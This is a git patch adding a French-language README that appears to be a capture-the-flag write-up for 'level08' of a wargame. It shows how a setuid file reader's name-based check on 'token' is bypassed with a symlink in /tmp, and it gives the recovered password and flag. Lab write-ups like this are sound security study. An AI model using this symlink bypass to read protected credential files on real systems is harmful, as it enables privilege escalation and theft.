From 81b0f0ae237bfe26eec5a8431d94b81449f6c62b Mon Sep 17 00:00:00 2001 From: Raphael Date: Tue, 27 Jan 2026 16:58:44 +0100 Subject: [PATCH] docs(lvl08): adding the readme --- level08/README.md | 51 +++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 level08/README.md diff --git a/level08/README.md b/level08/README.md new file mode 100644 index 0000000..33473e3 --- /dev/null +++ b/level08/README.md @@ -0,0 +1,51 @@ +Lors de mon arriver sur le level08 je remarque tout de suite que j'ai deux fichier sur mon home + +```bash +ls -l +total 16 +-rwsr-s---+ 1 flag08 level08 8617 Mar 5 2016 level08 +-rw------- 1 flag08 flag08 26 Mar 5 2016 token +``` + +Un executable qui malgres mes tentative ne me donne rien de vraiement precis uniquement mais qui semble lire un fichier + +```bash +./level08 +./level08 [file to read] +``` + +Et je tente alors de lire token mais il me met un message d'erreur + +```bash +./level08 token +You may not access 'token' +``` + +Mais la facon dont est fait le program protege uniquement un fichier qui contien token +```bash +ltrace ./level08 token +__libc_start_main(0x8048554, 2, 0xbffff7f4, 0x80486b0, 0x8048720 +strstr("token", "token") = "token" +printf("You may not access '%s'\n", "token"You may not access 'token' +) = 27 +exit(1 ++++ exited (status 1) +++ +``` + +Je decide donc de faire un lien symbolique sur le fichier de token ailleurs (la ou je peux ecrire) +```bash +ln -s /home/user/level08/token /tmp/test +``` + +Et j'obtiens quelque chose qui ressemble a un flag +```bash +./level08 /tmp/test +quif5eloekouj29ke0vouxean +``` + +qui n'est pas un flag mais le mot de passe pour flag08 auquel je me connect et fait la commande getflag + +```bash +getflag +Check flag.Here is your token : 25749xKZ8L7DkSCwJkT9dyv6f +```